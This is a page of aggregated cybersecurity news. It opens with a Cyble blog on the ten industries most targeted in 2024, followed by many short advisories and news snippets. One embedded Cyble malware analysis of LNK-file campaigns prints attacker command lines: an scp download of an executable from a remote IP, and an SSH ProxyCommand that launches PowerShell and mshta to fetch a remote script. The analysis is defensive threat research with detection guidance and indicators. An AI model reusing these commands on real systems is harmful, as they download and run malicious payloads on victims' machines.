As cyber threats continue to evolve, threat actors are refining their techniques and focusing on industries that hold valuable information or play critical roles in society. From ransomware attacks paralyzing operations to data breaches compromising millions of individuals, no sector is immune to cyberattacks. Drawing from recent reports and insights, this blog explores the top 10 industries targeted by cybercriminals in 2024 and the measures they can adopt to bolster their defenses.  1.Government and Public Sector: Custodians of National Security  Government agencies and public sector entities face constant threats, often from nation-state actors seeking strategic advantages or hacktivists with ideological motivations. The sheer volume of citizen data and critical infrastructure managed by these organizations makes them prime targets.  Major Threats:  Espionage: Stealing sensitive data for strategic or financial advantage.  DDoS Attacks: Overwhelming systems to disrupt public services.  Mitigation Strategies:  Government entities need to prioritize inter-agency collaboration and establish centralized cybersecurity frameworks. Investments in AI-based threat intelligence platforms and public-private partnerships can also bolster resilience against sophisticated attacks.  2. Energy and Utilities: The Backbone of Critical Infrastructure  The energy and utilities sector plays a pivotal role in national economies and security. This makes it a frequent target for both cybercriminals and nation-state actors, with attacks often aiming to disrupt critical infrastructure.  Major Threats:  ICS Attacks: Compromise of control systems can lead to widespread outages.  Supply Chain Attacks: Threat actors exploit vulnerabilities in third-party vendors to infiltrate systems.  Mitigation Strategies:  To protect against these threats, the sector must prioritize ICS cybersecurity by segmenting operational networks from IT networks. Enhanced supply chain scrutiny, robust third-party risk management to monitor vendor vulnerabilities, and partnerships with government cybersecurity agencies can further strengthen defenses against advanced threats.  3. Healthcare: Where Lives and Data Intersect  The healthcare industry is one of the fastest-growing targets for cybercriminals, with a staggering 180% increase in ransomware and database leak incidents compared to 2023. Patient safety, critical care, and sensitive medical data make this sector highly lucrative for attackers.  Major Threats:  Ransomware: Delays in accessing medical records can have life-threatening consequences.  Database Leaks: Leaked patient records often lead to identity theft and insurance fraud.  Mitigation Strategies:  Healthcare organizations must adopt a layered security approach, including data encryption, multi-factor authentication, and comprehensive employee training programs to detect phishing attempts. Regular cybersecurity drills and incident response planning are also essential.  4. Manufacturing: The Cornerstone of Global Supply Chains  The manufacturing sector leads the list, experiencing an alarming 377 confirmed attacks in the first half of 2024 alone. Manufacturing remains vital to the global economy, and its reliance on interconnected systems, including Industrial Control Systems (ICS), exposes it to significant risks.  Major Threats:  Ransomware: By locking critical systems and demanding high ransoms, ransomware attacks in manufacturing can lead to halted production lines, financial losses, and delayed supply chains.  Database Leaks: Intellectual property, design data, and supply chain information have been prime targets for data exfiltration.  Mitigation Strategies:  To mitigate these threats, manufacturers should prioritize securing Industrial Control Systems (ICS) by isolating critical systems, conducting regular vulnerability assessments, and adopting robust endpoint protection solutions. Additionally, incorporating advanced network monitoring tools like Cyble Vision can help detect anomalies before they escalate into breaches.  5. Financial Services: A Prime Target for Monetary Gain  The financial services sector consistently ranks among the most targeted industries due to its access to funds and sensitive customer data. In 2024, cybercriminals have adopted sophisticated tactics, leveraging advanced persistent threats (APTs) and exploiting insider vulnerabilities.  Major Threats:  Ransomware: Demands for multimillion-dollar payments are becoming routine.  Cryptocurrency Exploits: Attackers target blockchain systems and exchanges to siphon off digital assets.  Phishing and Social Engineering: Deceptive tactics to gain unauthorized access to accounts.  Mitigation Strategies:  To combat these threats, financial institutions must deploy state-of-the-art AI-driven Threat Intelligence tools. These tools can identify anomalous patterns indicative of fraud or cyberattacks. Additionally, implementing strict access controls and conducting regular security audits are crucial for minimizing risk.  6. Professional Services: Custodians of Confidential Data  Professional service firms, including law, accounting, and consulting firms, have witnessed a 15% uptick in cyberattacks compared to 2023. These organizations store highly sensitive client data, making them attractive to threat actors.  Major Threats:  Ransomware: Disruption in service delivery can damage client relationships.  Database Leaks: Exposed data can lead to legal liabilities and reputational damage.  Mitigation Strategies:  Firms should enforce strict data access controls and encrypt all client information. Regular penetration testing and vulnerability scans can help identify weaknesses before attackers exploit them. Moreover, adopting secure communication platforms can safeguard sensitive exchanges.  7. Technology: Guardians of Innovation  Technology companies, encompassing software developers, IT services, and hardware manufacturers, remain high-value targets. Although a slight decline in attacks was noted in 2024, this sector is still vulnerable due to the sensitivity of its intellectual property.  Major Threats:  Data Breaches: Proprietary technology, source codes, and user data are often exfiltrated.  Ransomware: Cybercriminals lock critical software systems, halting innovation pipelines.  Mitigation Strategies:  Incorporating advanced AI-driven cybersecurity solutions can detect and neutralize threats in real-time. Technology firms should also implement bug bounty programs to uncover vulnerabilities before malicious actors exploit them.  8. Retail and E-commerce: A Treasure Trove of Consumer Data  Retailers and e-commerce platforms process massive volumes of personal and payment information, making them a lucrative target for threat actors. In 2024, both online and physical operations have faced increased attacks.  Major Threats:  POS Malware: Point-of-sale systems are compromised to steal cardholder data.  Credential Stuffing: Attackers exploit reused passwords to breach user accounts.  Mitigation Strategies:  Retail businesses must adopt end-to-end encryption for payment data, deploy multi-factor authentication for account access, and regularly monitor systems for unusual activity. Cybersecurity awareness campaigns targeting both employees and customers can further reduce risks.  9. Education: Hubs of Knowledge and Innovation  Educational institutions, particularly universities, are increasingly targeted for their intellectual property, personal data, and operational vulnerabilities. Attackers often aim to disrupt operations or monetize stolen data on the dark web.  Major Threats:  Dark Web Exploitation: Selling stolen academic research and personal data.  DDoS Attacks: Crippling online learning platforms and administrative systems.  Mitigation Strategies:  Educational institutions must implement robust cybersecurity frameworks, including identity management systems and regular security awareness training. Strong network segmentation and frequent system updates can also help reduce exposure to cyber threats.  10. Small Businesses: The Underdogs in Cybersecurity  Small and medium-sized businesses (SMBs) are often perceived as easy targets due to their limited cybersecurity budgets and expertise. Despite their size, the impact of a breach on SMBs can be devastating.  Major Threats:  Phishing: Cybercriminals manipulate employees to gain access to sensitive data.  Ransomware: Locking systems and demanding ransoms can cripple operations.  Mitigation Strategies:  SMBs should focus on implementing basic yet effective cybersecurity measures, such as routine software updates, secure data backup solutions, and employee training programs to recognize phishing attempts. Outsourcing cybersecurity to managed service providers (MSPs) can also offer cost-effective protection.  Emerging Trends in Cybersecurity Attacks Across Industries  While the above industries remain top targets, certain emerging trends in cyberattacks warrant attention across sectors:  Supply Chain Vulnerabilities: Attackers increasingly target third-party vendors to infiltrate larger organizations.  AI-Driven Threats: Threat actors are using AI to automate attacks and evade traditional security measures.  Deepfake and Impersonation Scams: These new-age tactics are used to manipulate trust and extract sensitive information.  Key Takeaways for 2024  Ransomware Dominates: Nearly every industry has faced ransomware attacks, underscoring the need for robust backup and recovery strategies.  Employee Awareness is Crucial: Phishing and social engineering remain the primary methods of attack. Training employees to recognize these threats can significantly reduce risks.  AI-Powered Defense is Essential: As attackers become more sophisticated, industries must leverage AI and machine learning to stay ahead.  Conclusion  The evolving cyber threat landscape in 2024 underscores the importance of vigilance, innovation, and collaboration in cybersecurity. Whether it is the manufacturing sector grappling with ICS vulnerabilities or small businesses struggling with limited resources, all industries must adopt a proactive stance. By prioritizing security investments, fostering a culture of awareness, and leveraging cutting-edge technologies, organizations can safeguard their operations, customers, and reputations in an increasingly connected world.  The road ahead demands resilience, adaptability, and a unified effort against cyber adversaries. Let 2025 be a year of strengthened defenses and collective action to combat the relentless tide of cyber threats.  The post Top 10 Industries Targeted by Threat Actors in 2024  appeared first on Cyble.

by CYBLE

by ComputerWeekly

The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the threat actor UAC-0125 abuses Cloudflare Workers services to target the Ukrainian army with Malware. The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the threat actor UAC-0125 exploits Cloudflare Workers to target the Ukrainian military, spreading malware disguised as the mobile app Army+ […]

by Security Affairs

This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about  malicious Windows drivers.

by Cisco Talos Blog

On November 29th, 2024, Black Friday, shoppers flooded online stores to grab the best deals of the year. But while consumers were busy filling their carts, cyber criminals were also seizing the opportunity to exploit the shopping frenzy. Our system detected a significant surge in Gozi malware activity, targeting financial institutions across North America. The […] The post Black Friday chaos: The return of Gozi malware appeared first on Security Intelligence.

by Security Intelligence

A free VPN app called Big Mama is selling access to people’s home internet networks. Kids are using it to cheat in a VR game while researchers warn of bigger security risks.

by WIRED Security News

The threat intelligence firm observed deployment of backdoors, but has not seen mass data theft thus far.

by Cybersecurity Dive

Juniper Networks says a Mirai botnet is ensnaring session smart router devices that are using default passwords. The post Juniper Warns of Mirai Botnet Targeting Session Smart Routers appeared first on SecurityWeek.

by SecurityWeek

Privileged access management company BeyondTrust suffered a cyberattack in early December after threat actors breached some of its Remote Support SaaS instances. [...]

by BleepingComputer

The bank “negligently made” materially misleading statements after a hack that resulted in the theft of 1.5 million customers’ personally identifiable information.

by Cybersecurity Dive

Privacy-enhanced alternatives to Office, WhatsApp and Evernote for Christmas and New Year gifts.

by Kaspersky

Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.

by Securelist

Ukrainian national Mark Sokolovsky was sentenced to 60 months in federal prison for one count of conspiracy to commit computer intrusion. According to court documents, he conspired to operate the Raccoon Infostealer as a malware-as-a-service (MaaS). Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency. These individuals used various ruses, such as email phishing, to install the malware onto the … More → The post Ukrainian hacker gets prison for infostealer operations appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

Overview Starting this year, Cyble Research and Intelligence Labs (CRIL) has observed a significant trend where threat actors (TAs) have increasingly leveraged LNK files as an initial infection vector in multiple campaigns. These malicious shortcut files, often disguised as legitimate documents, have become a preferred entry point for attackers seeking to compromise systems. This shift in tactics aims to bypass traditional security mechanisms and deceive users into executing the malicious LNK file, thereby initiating a multi-stage cyber attack to deploy the final payload. In these campaigns, the LNK files are meticulously crafted to execute commands using multiple Living-off-the-Land Binaries (LOLBins). By exploiting the inherent functionalities of these binaries, attackers can download or execute additional malicious components, thereby advancing their attack chain. While modern endpoint detection and response (EDR) solutions have evolved to detect such activities by monitoring the behavior of LNK files and flagging suspicious use of known LOLBin binaries, this has led TAs to refine their techniques to bypass these advanced security measures. Recently, CRIL uncovered an additional layer of sophistication in these attacks: the use of SSH commands within malicious LNK files to execute a range of malicious activities. This emerging technique highlights how threat actors leverage SSH commands to maintain persistence and control over compromised systems. While the malicious use of SSH is not a new tactic, its ongoing relevance as an evasion technique underscores the need for continuous vigilance in monitoring trusted utilities for anomalous behavior. Pivoting on the identified SSH abuse techniques, CRIL has tracked several campaigns where SSH commands were exploited to carry out malicious operations, further emphasizing the evolution of attack methods. Notably, APT groups have also incorporated this technique into their arsenal, highlighting their growing use in sophisticated cyber campaigns. SSH using the SCP command In this campaign, a malicious .LNK file is configured to execute SSH commands that use the scp (Secure Copy Protocol) command to download a malicious file and execute it on the local system. The image below illustrates the contents of the .LNK file. Figure 1 - Contents of the .LNK file The use of SSH commands and SCP on Windows systems is relatively less, which may allow malicious activity to go undetected by traditional security solutions that are not specifically configured to monitor such behavior. The .LNK file is configured with the following SSH options to facilitate the attack: -o ""PermitLocalCommand=yes"": Allows the execution of a local command once the SSH connection is established. -o ""StrictHostKeyChecking=no"": Disables host key verification, bypassing prompts or errors when connecting to untrusted servers. The SSH client executes the SCP command below: scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\ This command downloads a malicious file named christmas-sale.exe from the /home/revenge directory on the remote server to the local directory c:\users\public\. The downloaded file is then executed, advancing the attack chain. Abuse of SSH and PowerShell Commands In this campaign, a malicious .LNK file is configured to execute an SSH command that indirectly runs a malicious PowerShell command. The .LNK file utilizes a ProxyCommand option in the SSH command to execute PowerShell, which then invokes mshta.exe to access a remote malicious URL. The execution of this command allows the attacker to download and execute a potentially harmful payload on the local system. The image below shows the contents of the .LNK file. Figure 2 - Contents of the .LNK File The .LNK file is configured with the following SSH options: -o ProxyCommand=""powershell powershell -Command (''mshta.exe hxxps[:]//www.google.ca/amp/s/goo.su/IwPQJP'' The SSH client executes the PowerShell command, which runs mshta.exe to fetch and execute the malicious script from the specified URL. Abuse of SSH and CMD Commands In this campaign, a malicious .LNK file is crafted to execute an SSH command, which then triggers rundll32 to load a malicious DLL and launch a PDF file (lure document), both located in the current directory. The image below illustrates the contents of the .LNK file. Figure 3 - Contents of the LNK file The SSH client executes cmd.exe, which in turn launches the rundll32 utility to load the malicious DLL and execute the PDF, advancing the attack chain. By analyzing the artifacts and DLL payload associated with this campaign, we observed behavior resembling stealer malware compiled in Go, which we previously discussed in a blog targeting the Indian Air Force. Additionally, another article highlights similar behavior, attributing the stealer payload (HackBrowserData—an open-source tool) to the APT group ''Transparent Tribe’. Conclusion The combination of LNK files and SSH commands has emerged as a notable trend in recent campaigns, signaling a shift in the tactics used by threat actors. By leveraging SSH commands in conjunction with various LOLBins, attackers can establish connections to remote servers, download payloads, and maintain persistence on compromised systems. As demonstrated in the analyzed campaigns, these techniques are continuously evolving, with threat actors refining their methods to evade detection by exploiting trusted system utilities. As the cyber threat landscape progresses, organizations must remain vigilant and adapt their security strategies to effectively counter these increasingly sophisticated attack vectors. The Sigma rule to detect these campaigns leveraging SSH commands is available for download from the GitHub repository.  Recommendations To mitigate potential SSH abuse, closely monitor the activities of the legitimate SSH utility, restrict its usage to authorized users, and implement robust detection mechanisms to identify suspicious activities involving ssh.exe, particularly those with abnormal or malicious command-line parameters. Disable OpenSSH features on systems where it is not required. Indicators of Compromise (IoCs) Indicators  Indicator Type Description 8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494 SHA-256 Lnk file – Campaign 1 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Lnk file – Campaign 2 0016e1ec6fc56e4214e7d54eb7ab3d84a4a83b4befd856e984d77d6db8fc221d SHA-256 Lnk file – Campaign 3 References https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/ https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign The post LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks appeared first on Cyble.

by CYBLE

Netwrix released a new version of its SaaS platform, Netwrix 1Secure. The latest version builds on its existing security monitoring functionality with more robust access rights assessment and expanded security auditing capabilities to overcome the lack of control when relying only on native security tools in Microsoft 365. Netwrix 1Secure helps customers promote a secure IT environment with the following added functionality: Risky permissions identification in SharePoint Online. Reporting on permissions provides actionable insights to … More → The post Netwrix 1Secure enhances protection against data and identity access risks appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

The agency’s recommendations are not for the technically inept. Yet the extraordinary measures, including the use of encrypted apps, are applicable to all audiences.

by Cybersecurity Dive

NetSPI introduced three tiers of external attack surface management (EASM) solutions, delivered through the The NetSPI Platform. The new offerings address the evolving needs of NetSPI’s global customer base, to move toward a continuous threat exposure management (CTEM) model and proactive security posture. “To outpace today’s adversaries, organizations need continuous discovery, assessment and controls validation of their attack surfaces,” said Tom Parker, CTO at NetSPI. “Our EASM offerings equip security teams with comprehensive visibility, powerful … More → The post NetSPI introduces external attack surface management solutions appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

Git, repositories and pipelines…oh my! We unpack standard practices in the web app development process and provide guidance on how to use Tenable Web Application Scanning to secure your code.Awesome! This should be easy. All you need to start is … Wait… what''s a pipeline?Well, let''s start there. Have you ever used a code repository to track code changes? Every time you make an update to the repository files/code, you have to do what''s called a “git commit” and “git push.” Developers use Git as a foundation to run their CI/CD pipelines.Wait … what''s Git, and what does CI/CD mean?To be clear, continuous integration and continuous deployment (CI/CD) is a methodology — not a tool.The “D” in CI/CD is often referred to as “delivery” instead of deployment. For the purposes of this blog post, since we are talking about the deployment side of it, I will use that here.Before we get there, let’s talk about version control. Time to roll back a few years. In 2005, Linus Torvalds, the creator of Linux, built something called “Git,” an open source version control software. Version control allows you to track and control all changes to a codebase.These codebases, called repositories, are generally used for managing code that is the basis for any software or website that you can think of. Git is the most commonly used version control system while GitHub, now owned by Microsoft, is one of the cloud-based repository hosting platforms utilizing Git.Developers have been using this great version control tool ever since, but every time they wanted to test their production applications/software, they had to do the following:Log on to a serverPull code from a repositoryPackage code up in a nice zip-type fileSend that package to another server that was the staging/testing environmentRun the application and confirm it still runs at allRun any tests needed against it, such as allowing other developers to come in and poke at it to find broken parts of the applicationThe most efficient developers would make scripts to automate some or all of this work, but there was an even better way… Source: Tenable, December 2024 What is continuous integration?Integration here might not mean what it sounds like. It means that you are building your application and running tests on a schedule or every single time you make a change to your code. Think about how much time this can save. Instead of having to assign tasks out to a team of testers, those tests run every time you change the code. Can you imagine knowing about all of your issues right away?On top of that, continuous integration automatically builds your application, so you don’t have to package and run it yourself, letting you keep working on building.For security pros, this is the spot in a pipeline where the dynamic application security testing (DAST) scanner — available in Tenable Web Application Scanning — can help.At Tenable, we want developers to know about security issues as soon as possible. For reference, this is where software composition analysis (SCA) and static application security testing (SAST) scanning also live. Those tools are used for looking at source code, whereas Tenable Web Application Scanning looks at a built application and scans it with real network requests.Jenkins is considered the first main and widely adopted CI tool. Jenkins helped teams adopt this methodology. Some teams were already doing this with homegrown solutions. We have documentation on how to deploy the web app scanner in a Jenkins CI/CD pipeline.What is continuous deployment?Deployment is when you take what you have built and push it out for real use. It’s building an application for production use rather than just for quick testing. Back in the day, developers would log onto their servers and make updates to the applications on the fly. If something broke, well, you’d better remember the changes you made and have fun spinning that back up.Automated deployment allowed developers to run one script that would spin up an entire environment or application all in one go. Application falls down? No problem! Run the deployment and it can be back up soon.Continuous deployment allows for changes to be made in the source code and for those to be automatically sent to production. No dev or IT team time is wasted in changing live servers.Wrapping it all upPHEW. Ok. A CI/CD pipeline is where you combine version control (Git), continuous integration and continuous deployment. It allows teams to develop applications very quickly and not waste time. The pipeline is the ongoing stream of tests and automated actions that all happens based on code changes.Over time, tools became better and more appeared, such as Bamboo and CircleCI and some others. GitHub Actions came out in 2015, allowing developers to automate software development workflows from within GitHub.Tenable Web Application Scanning can scan any pipeline. It offers code examples for testing for various tools, but you can throw a test into any pipeline.For more documentation on how to implement, see Tenable’s DocumentationNow, back to the original question: So, you want to scan some web apps in the pipeline?You can walk through the “how to run Web App Scans in your CI/CD pipeline” in this public demo: https://demo.tenable.com/share/lajsp7ujjmzbLearn moreView the on-demand webinar Tenable Web Application Scanning Customer Update, April 2024Visit the product page, https://www.tenable.com/products/web-app-scanningDownload the data sheet, Vulnerability Exposure: A simple, scalable approach to dynamic application security testing 

by Tenable

Ataccama announced enhancements to the Ataccama ONE unified data trust platform v15.4 that enable customers to have confidence in using their data for business-critical decision-making. In this latest release, enhancements include augmenting its AI capabilities, streamlining user experience, and simplifying task management for greater efficiency and cost reduction. The latest edition of Ataccama ONE includes the following new updates: Extended generative AI functionality: Designed for new and non-technical users, the new AI-powered features allow them … More → The post Ataccama ONE platform enhancements accelerate enterprise data quality initiatives appeared first on Help Net Security.

by Help Net Security

Enpass added Single Sign-On (SSO) for its admin console in support for its Business Enterprise customers. Enpass integrates seamlessly with prominent Identity Providers (IDPs) such as Google Workspace, Okta, and Microsoft Entra ID, further enhancing Enpass’s approach to simplifying compliance and security controls for password and credential management. With SSO as an added layer of efficiency for its admin console, Enpass continues to lead in delivering password management solutions that prioritize customer choice and security-first … More → The post Enpass simplifies compliance and security controls for password management appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

The U.S. government may ban TP-Link routers in 2025 if investigations confirm their use could pose a national security risk. The U.S. government is investigating whether TP-Link routers, linked to cyberattacks, pose a national security risk, the Wall Street Journal reported. According to the WSJ, the U.S. government is considering banning TP-Link routers starting in […]

by Security Affairs

As AI adoption accelerates, businesses face rising cloud costs and budget unpredictability, necessitating smarter strategies for resource management, training, and AI-driven optimization.

by ITPro Today

Security teams that subscribe to threat feeds get lists of known malicious domains, IPs, and file signatures that they can leverage to blacklist and prevent attacks from those sources. The post Are threat feeds masking your biggest security blind spot? appeared first on Help Net Security.

by Help Net Security

U.S. enterprises are spending an average of $29M a year on the cloud, driven by AI initiatives, financial optimization, and cloud-native technologies, a Forrester report finds.

by ITPro Today

The number of DDoS-related incidents targeting APIs have jumped by 30x compared with traditional Web assets, suggesting that attackers see the growing API landscape as the more attractive target.

by Dark Reading

by CrowdStrike

by CrowdStrike

<p>We're back with another post about common malware techniques. This time, we are talking about using shared memory sections to inject and execute code in a remote process. This method of process injection uses Windows…</p>

by TrustedSec

This vulnerability allows local attackers to escalate privileges on affected installations of Arista NG Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.6. The following CVEs are assigned: CVE-2024-12831.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create arbitrary files and disclose sensitive information on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.3. The following CVEs are assigned: CVE-2024-12832.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-12830.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-12829.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11364.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11157.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12175.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11364.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tibbo Aggregate Network Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-12700.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to disclose sensitive information on affected installations of AnyDesk. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-12754.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12200.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12198.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12197.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12179.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12194.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12192.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12191.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12178.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12671.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12670.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12669.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11422.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of libarchive. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-26256.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of XWiki.org XWiki. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of libarchive. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-20697.

by Zero Day Initiative Advisories

Stay alert to crypto scams with our guide to 2024’s top threats, including phishing, malware, Ponzi schemes, and…

by Hackread

An IT pro seeks guidance on hardening Windows systems after overcoming a ransomware attack.

by ITPro Today

Russia-linked APT29 group uses malicious RDP configuration files, adapting red teaming methods for cyberattacks to compromise systems. In October 2024, the Russia-linked cyber espionage group APT29 (aka Earth Koshchei, SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) used rogue RDP attacks via phishing emails targeting governments, think tanks, and Ukrainian entities to steal data and install malware. The […]

by Security Affairs

Learn about the latest trend in ransomware attacks known as double extortion. Discover how Darktrace can help protect your organization from this threat.

by Darktrace

The agency asks the cybersecurity community to adopt "romance baiting" in place of dehumanizing language.

by Dark Reading

This year’s top AI stories highlight developments among industry giants, a breadth of security vulnerabilities, and new use cases.

by ITPro Today

The National Defense Authorization Act passed today, but lawmakers stripped language that would keep the Trump administration from wielding unprecedented authority to surveil Americans.

by WIRED Security News

TP-Link products have been connected to several high-profile hacking incidents. (Also, they''re made in China.)

by ZDNET Security

The threat intelligence business, which is set to be acquired by Mastercard for billions, is officially vendor non grata in Putin''s regime.

by Dark Reading

Researchers warn that threat actors are attempting to exploit a recently disclosed Apache Struts vulnerability CVE-2024-53677. Researchers warn that threat actors are attempting to exploit the vulnerability CVE-2024-53677 (CVSS score of 9.5) in Apache Struts. A remote attacker could exploit this vulnerability to upload malicious files, potentially leading to arbitrary code execution. “An attacker can […]

by Security Affairs

Over the past few months, enterprises have observed a pattern of sophisticated spearphishing attempts targeting their executives, with some specifically targeting their mobile devices. Our blog shares the details. The post Mobile Spear Phishing Targets Executive Teams appeared first on Zimperium.

by Zimperium

A security researcher found customer names and workplace affiliations spilling directly from Hapn''s servers. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

KEY SUMMARY POINTS The FBI has issued a Private Industry Notification (PIN) to highlight new malware campaigns targeting…

by Hackread

Cybersecurity researchers have disclosed a new phishing campaign that has targeted European companies with an aim to harvest account credentials and take control of the victims'' Microsoft Azure cloud infrastructure. The campaign has been codenamed HubPhish by Palo Alto Networks Unit 42 owing to the abuse of HubSpot tools in the attack chain. Targets include at least 20,000 automotive, chemical,

by The Hacker News

Threat actors are attempting to exploit a recently disclosed security flaw impacting Apache Struts that could pave the way for remote code execution. The issue, tracked as CVE-2024-53677, carries a CVSS score of 9.5 out of 10.0, indicating critical severity. The vulnerability shares similarities with another critical bug the project maintainers addressed in December 2023 (CVE-2023-50164, CVSS

by The Hacker News

